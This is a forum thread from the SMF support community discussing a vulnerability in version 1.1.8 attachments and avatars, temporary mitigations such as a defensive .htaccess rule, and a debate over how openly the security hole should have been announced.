Hacked: 1.1.8 attachments / avatars still has a vulnerability

[JBlaze]

Hi Lexa, thanks for the reply & much as it's appreciated I would not have a clue how to do that & as our site owner is just a bit elusive & it would be him that normally does that sort of thing, so we are a bit stuck. So we just hope that the patch will fix things for us.

The patch is intended to close off the exploit as well as do much more. It will not, however, clean your forum if it has been hacked. This patch covers all three branches of SMF. (1.0.x - 1.1.x - 2.0)

[dreamers4317]

Oh bugger!

[JBlaze]

Oh bugger!

If you have been hacked, feel free to start a topic and members here will be glad to assist you.

[dreamers4317]

But you could also just clean out the files and database manually, and while that would require a bit of work, it would also save your new posts from the time after this hack occurred.

Can any one give us a simple blow by blow way of doing this please?

[Sverre]

We don't use the attachments or locally stored avatars features on our SMF forum, so these last exploits haven't really been an issue for us, but I have to agree with wtmpp, that the way this has been handled by SMF doesn't exactly aspire confidence...

I visit this community on a daily basis, but since I'm not looking for support at the moment, I rarely, if ever, open the SMF 1.x Support board. I actually only became aware of this situation by chance while reading the Bug Tracker. I understand the desire not to broadcast the vulnerability to the world, but if information about it can be posted publicly in this board, I don't see why it couldn't have been posted in the News and Updates board, where it would be much more prominent to visitors of the community, instead. By trying to keep such a tight lid on these situations, I feel SMF does its members/users a huge disservice.

I'm just glad that the restrictive permission scheme we're running already keeps us safe from many of these attacks, especially considering the fact that MagicOPromotion paid us a visit a couple of weeks ago.

[DavidCT]

I don't suppose disabling PHP execution itself in the folder would fix this right?  If it did you could do this...

.htaccess (in avatars and attachments folders)

Code Select Expand


AddHandler cgi-script .php .pl .py .jsp .asp .htm .shtml .sh .cgi
Options -ExecCGI


Trying to execute php scripts would give a 403 error.

[LiroyvH]

CoreISP/Liroy, here are the 1st  4 stickied posts. Does any of them have any specific "Call To Action?"

By the looks of it, yes it does tell you what you can do to temporarily secure your forum.

Lets get personal, you run hosting company, correct?
http://order.dedicatedbox.net/cart.php?a=confproduct&i=0 Here is a link to the details page of one of your hosting offerings, and I see you use Plesk.

I dont use Plesk myself, I use cPanel, but yes, I do offer it.

Now lets say that you have a Linux administrator who regularly sends you an email about the security update news he comes across.
There is a major security hole in Plesk9 that allows an attacker to take COMPLETE CONTROL OF THE SERVER. Your linux admin sends you a notice (one of MANY) that says
'How to secure and harden Plesk against attack" ...
do you think an issue as serious and with as severe implications as this would deserve a more *assertive* warning?

I have no doubt that Plesk 9 has security holes, lol. (just kidding)
Anyway, assuming that such a big security hole would be in place:
No, because I would know they are working on a solution. (Plesk is paid by the way, SMF is free)
If they are working on a solution, and they warn me that it is best to disable 2 features on the system while they are working very hard on a patch, then I will most certainly disable those 2 features.
It's not a "assertive" warning, it is simply a big warning telling you that there is a major issue and that you should take steps immedieately while the problem is being attended to by their programmers.
Leaving those 2 functions enabled when it is not patched is simply dumb and being lazy.

It may be bad to shout "fire" in a crowded theater, but is it better to whisper? What if there really IS a fire? Should we all burn?

There are tons of topics on this issue, and if a patch is released, people will know.
Pointless to light the same fire if there is no point.

Ask yourself this: If you had an employee who's job it was to monitor security news and bring matters to your attention and THAT was the casual way he did it... wouldnt you *fire his ass??*

... Why? If he is doing his job and there is nothing he can do, except for providing tepm. steps to secure the system, while the coders are working on it, why should I fire him? For bringing news that isnt exactly what I want to hear because I dont like security issues? Nice boss that would fire you

Anyway, I think you are overreacting. There is a problem, it is being attended to and in the meanwhile a temp. solution has been given multiple times all over the forum. If you dont follow that advice then it is your own fault if you run in to issues. Nothing more that I can say about it.

/exit topic.


Sincerely,
- Liroy

[JBlaze]

Thanks Liroy. Perfectly put.

To add on, there are members who have dedicated alot of their time to helping members who have been attacked. I, myself, have dedicated countless hours to helping others resolve this issue and also help secure their site temporarily until this patch is released.

There are other ways to prevent this attack from happening as well. SMF could say "Screw it, just take your forum offline. Problem solved." But no, they didn't. Instead, they choose to take the time and get the patch done right. How the SMF Team has handled this situation as far as making it public, that is totally up to them, and I agree with the way they are doing it, but it remains personal preferece I guess.

Just think, there are alot of changes happening at this time. The SMF Team has its hands full with 2.0 RC2, Curve, and this attack just as a sample. Just keep in mind that the steps provided in these many topics are intended to temporarily prevent the attacks from happening until the patch is out. Sometimes, you gotta sacrifice functionality for security.

Best regards,
JBlaze

[kat]

Of course, there's the other way of looking at it...

If this vulnerability was broadcast in big letters all over the net, other script-kiddies would know about it and try to exploit it.

We all have our own opinions and slamming people about it will hardly help matters.

Just my tuppence worth...

[babjusi]

I agree. Smf team is very busy with the smf 2 and all and knowing the smf staff that it takes the security very seriously, I am sure that they are working hard at releasing a patch that would fix the issue. However these things must be thoroughly tested before being released and this could take some time. So the best way is to hang on for a bit more and give the team the time needed to take care of it.

[busterone]

I have been watching this since it first became known that there was an issue. I have especially noticed how efficient and helpful JBlaze has been in this situation. Although I was not hacked myself, I beleive thanks and kudos to you JBlaze for your efforts here are in order. I also want to commend all of the staff for the handling of this problem. I agree with the way it has been handled. Every other script kiddie in the world does not visit this site, but you can bet that if a widespread announcement was made, hundreds more would jump on the bandwagon and try their hand at hacking a few sites. I believe more damage would have occurred if that were so.  That said, I should also say no more on this subject myself either, other than thanks to all the hard working volunteers that do this on their own time.

[Faded Glory]

I too, have no dog in this fight. As soon as I saw the first topic on here about this exploit and the hacker I went and made sure to secure my forum.

I am not a coder nor do I have the ability to do the intricate work that goes into adding or removing script.

I can use common sense and make sure my door is locked to try and keep a thief out.

JBlaze has gone up and beyond the call of duty on this. I have read nearly everything he has put up about this. Everytime I get on here, he is here. So kudos to him and the team for all the long hours of FREE work you all have put on here fighting this fire!

Cheers mates 

[wtmpp]

@ David CT. Your htaccess snippet is good to use as a general practice, but would not be applicable to this particular exploit  I think, because the exif data is being parsed by SMF and is executed within the context of an area that HAS to be able run php AND IS ALREADY RUNNING PHP when it is executing the code hiding in the jpeg.

@Those who see themselves in the following

look, SMF is a big ecosystem, like the Rainforest, there's room for everyone I think and we all play our part, from the casual users who just want to have a forum (any forum) to base their community, to those who seek to profit from and sell to the huge SMF community, those who lack a sense of personal identity and find here a "place where they can BE SOMEBODY IMPORTANT AND A REAL MAN" - (like World Of Warcraft w/o the spells and subscription fees : ), and the obsequious fan boys, to whom SMF can do no wrong and who sit poised like crows on a telephone pole to vociferously denounce as "flames" and "trolling" common sense arguments demanding an equitable and sensible approach to dealing with security issues.

Yeah, there's room for all in this big tent or jungle

There are other ways to prevent this attack from happening as well. SMF could say "Screw it, just take your forum offline. Problem solved." But no, they didn't. Instead, they choose to take the time and get the patch done right.

Why on earth would SMF or ANY company say something as ridiculous as "take your forum offline?"
For MOST communities with a forum, the forum IS the community! I guess it makes sense to proffer an even more bizarre position to offset an indefensible one?

Here is the approach that SMF should do /should have done.

1. Update the News feed that is pulled when you log in to your Admin panel warning of the issue. (1hr or less)

2. immediately on becoming aware of the problem, issue an alert (news on the front page) and release a version agnostic php file that would do the settings patch (via the mySQL database) to disable avatars and attachments.
(15 minutes)

3. Update the SMF download so that the downloaded version DISABLES THE AT RISK FUNCTIONALITY BY DEFAULT (1 hr)
Admins would see the security update in progress message when they log in.

3. THEN continue working on a more appropriate patch, that can secure the functionality AND allow it to be used.

I know you feel proud of yourself and your "countless hours spent" but really, it cant have been more than 4 or 5, and if this information was properly disseminated, it would have been ZERO.

I know full well that its a league of volunteers, but there is no excuse for sloppy, unprofessional attitudes backed up by a cheerleading team.

On some SMF forums I have seen, there is a message that pops up when you browse as guest

I see you are browsing as a guest! please login or register to see what we have to offer!

we could have..

NOTICE! - AN URGENT MESSAGE IS WAITING FOR SMF SITE ADMINISTRATORS- Please log in to SMF here, or to the admin panel of your forum!

@Kat - script kiddies have been running wild with this for months, and anyway, announcing that there is a vulnerability and a way to patch it (without getting into explicit details how to reproduce it or even exactly how the vector works,) is the appropriate thing to do, not bury heads in the sand, and hope "script kiddies dont pass by and see us with our butt in the air "

@babjus
I couldnt agree with you more, of course they will work hard on the patch!

you know, SMF could do something like IE and have a range of SQL files that set the SMF security context to Low, Medium, High, Lockdown?
Basically a sliding scale for functionality/vs paranoia/ vs security?
You can trade off simply what you want or are prepared to do without?
Experts of course, will use the fine-tuned controls in the admin panel

[LiroyvH]

Why on earth would SMF or ANY company say something as ridiculous as "take your forum offline?"

The point of the story was that that is exactly what they did !!NOT!! do.

Did you keep in mind that making a global announcement will let all script kidz0rs out th3r3 know about this issue? That would make it even a bigger issue.

I see you are browsing as a guest! please login or register to see what we have to offer!

We could have...

NOTICE! - AN URGENT MESSAGE IS WAITING FOR SMF SITE ADMINISTRATORS- Please log in to SMF here, or to the admin panel of your forum!

It is not SMF that maintains the messages that popup... It is user defined.


Anyway, no point in arguing with you. You are, according to yourself, right and everybody else that doesnt have the same opinion isnt right and is unprofessional... Hehe.

Good luck to you and your forum
I do hope you did disable those functions in the meanwhile though.


Sincerely,
- Liroy

[Ben_S]

we could have..

NOTICE! - AN URGENT MESSAGE IS WAITING FOR SMF SITE ADMINISTRATORS- Please log in to SMF here, or to the admin panel of your forum!

And draw widespread attention to a not very widely known security hole?

[JBlaze]

I have been watching this since it first became known that there was an issue. I have especially noticed how efficient and helpful JBlaze has been in this situation. Although I was not hacked myself, I beleive thanks and kudos to you JBlaze for your efforts here are in order. I also want to commend all of the staff for the handling of this problem. I agree with the way it has been handled. Every other script kiddie in the world does not visit this site, but you can bet that if a widespread announcement was made, hundreds more would jump on the bandwagon and try their hand at hacking a few sites. I believe more damage would have occurred if that were so.  That said, I should also say no more on this subject myself either, other than thanks to all the hard working volunteers that do this on their own time.

I too, have no dog in this fight. As soon as I saw the first topic on here about this exploit and the hacker I went and made sure to secure my forum.

I am not a coder nor do I have the ability to do the intricate work that goes into adding or removing script.

I can use common sense and make sure my door is locked to try and keep a thief out.

JBlaze has gone up and beyond the call of duty on this. I have read nearly everything he has put up about this. Everytime I get on here, he is here. So kudos to him and the team for all the long hours of FREE work you all have put on here fighting this fire!

Cheers mates 

Thanks, it's all in a days work and countless sleepless nights



@wtmpp: While you are allowed to have your opinion on this matter, it is obvious that you do not realize the full picture. I have been working with members as well as SMF Team Members on this issue. I have seen pretty much everything this attack can throw at me. So please, take things as they are and try not to start a huge debate/fight on a topic as serious as this.

Do not take this the wrong way, I am not flaming you. You are, as I said, entitled to your opinion. But in this case, your opinion is faulted. There are reasons why the SMF Team has done what they have done.

Now, allow me to go back to work.

Regards,
JBlaze

[Antechinus]

3. Update the SMF download so that the downloaded version DISABLES THE AT RISK FUNCTIONALITY BY DEFAULT (1 hr)

I can see the arguments in favour of not publicising the exploit more than necessary but I think this particular suggestion is worth considering.

@Kat - script kiddies have been running wild with this for months, and anyway, announcing that there is a vulnerability and a way to patch it (without getting into explicit details how to reproduce it or even exactly how the vector works,) is the appropriate thing to do, not bury heads in the sand, and hope "script kiddies dont pass by and see us with our butt in the air "

No, they haven't. This is a new exploit. It may be loosely related to earlier ones but script kiddies are not running wild with this one. It's being deployed by one specific group.

you know, SMF could do something like IE and have a range of SQL files that set the SMF security context to Low, Medium, High, Lockdown?
Basically a sliding scale for functionality/vs paranoia/ vs security?
You can trade off simply what you want or are prepared to do without?
Experts of course, will use the fine-tuned controls in the admin panel

I think this is another suggestion that is worth considering. Of course what will happen in practice is that many inexperienced admins will want all the frills and have no understanding of risks (we see this all the time) and will use the lowest security settings anyway, but at least it would give anyone who does want security and lacks skills a good warning and some easy options.

[Crasy]

I must add....

Why didn't we get told to disable attachments and avatars through our admin panels? I know it would have made a unknown problem known...

But...welll...even now when the problem IS widely known...why aren't we being told?
I'm sure every script kiddie knows about the exploit by now. It's time to tell the forum administrators.

However, however,
I must commend the efforts shown by staff, regulars and even random members around here. Seriously, you guys are doing a great job figuring this out. And while I cannot tell how much effort the devs are putting into a patch, I have to thank them in advance.

[Broken Arrow]

I have to add my 2cents here. I have had other forum software in the past and none of them offered anywhere near the support that SMF has offered. Anytime I need help, I come here and someone helps me within minutes it seems.
Once I knew images (avatars) were missing I came here and saw what was happening. I followed the directions on  what to do to stop it and then went about cleaning up the mess. JBlaze especially has gone out of his way to help me and many others.

This is the first time my forum has had any incident with some outsider causing any kind of trouble. And these fine folks here at SMF have done more to help those of us who aren't sure of what we are doing, than any other software support team ever has

I applaud every member of this support team.  You deserve high praise for your work!

and if someone else out there has an idea on how the support could be better, then I suggest signing up and becoming a member of the support team.

[legoracer]

I have to add my 2cents here. I have had other forum software in the past and none of them offered anywhere near the support that SMF has offered. Anytime I need help, I come here and someone helps me within minutes it seems.
Once I knew images (avatars) were missing I came here and saw what was happening. I followed the directions on  what to do to stop it and then went about cleaning up the mess. JBlaze especially has gone out of his way to help me and many others.

This is the first time my forum has had any incident with some outsider causing any kind of trouble. And these fine folks here at SMF have done more to help those of us who aren't sure of what we are doing, than any other software support team ever has

I applaud every member of this support team.  You deserve high praise for your work!

and if someone else out there has an idea on how the support could be better, then I suggest signing up and becoming a member of the support team.

X2

The SMF guys/gals just ROCK!! PHPbb wouldn't help like this...vbullcrap wouldn't help... SMF sure does!! Keep up the great work!! It is nice to have a FREE forum that has this much support!!  Where do i donate?